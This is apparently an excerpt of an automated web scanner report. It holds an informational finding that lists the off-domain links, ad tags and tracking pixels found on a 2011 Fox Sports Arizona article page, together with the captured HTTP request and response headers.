<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster' target = '_blank' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nhl/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nhl/index.asp?season=reg' target = '_blank' >NHL leaders</a>
...[SNIP]...
<a href='/pages/sundevils' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azwildcats' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azcardinals' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/fb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/fb/index.asp' target = '_blank' >NFL stats</a>
...[SNIP]...
<a href='/pages/mercury' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/wnba/stats.asp?team=06' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/wnba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/wnba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/wnba/leaders.asp' target = '_blank' >WNBA stats</a>
...[SNIP]...
<a href='/pages/nau' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_399825">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825^feedID=3698^gt1=39002^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=399825&feedID=3698&gt1=39002&" target=_blank rel="nofollow">
...[SNIP]...
sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('No limits for Robles as next stage beckons') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/common/dynrss/dynrss_3698_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/leaderboard
" target='_blank'>
Round 4 at Torrey Pines
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011
" target='_blank'>
Djokovic tops Murray in straight sets
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/senior-bowl-stock-rise-and-fall-012911
" target='_blank'>
Senior Bowl: Risers and fallers
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911
" target='_blank'>
Ponder leads South to Senior Bowl win
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/gallery/senior-bowl-gallery-012911
" target='_blank'>
Senior Bowl photos
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/jimmie-johnson-seeking-first-win-at-rolex-24-at-daytona-012911
" target='_blank'>
Rolex 24 action is wild and woolly
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/Aggressive-pace-stumps-veteran-drivers-in-Rolex-24-012911
" target='_blank'>
Aggressive pace stumps veterans
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
" target='_blank'>
Louisville holds off UConn in double OT
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

22.424. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:35 GMT
Date: Sat, 29 Jan 2011 23:53:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.redacted/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Arizona</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/dbacks' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles' target = '_blank' >Team stats</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/mlb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/mlb/index.asp' target = '_blank' >MLB leaders</a>
...[SNIP]...
<a href='/pages/suns' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/nba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nba/index.asp' target = '_blank' >NBA leaders</a>
...[SNIP]...
<a href='/pages/coyotes' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster' target = '_blank' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nhl/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nhl/index.asp?season=reg' target = '_blank' >NHL leaders</a>
...[SNIP]...
<a href='/pages/sundevils' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azwildcats' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azcardinals' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/fb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/fb/index.asp' target = '_blank' >NFL stats</a>
...[SNIP]...
<a href='/pages/mercury' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/wnba/stats.asp?team=06' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/wnba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/wnba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/wnba/leaders.asp' target = '_blank' >WNBA stats</a>
...[SNIP]...
<a href='/pages/nau' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
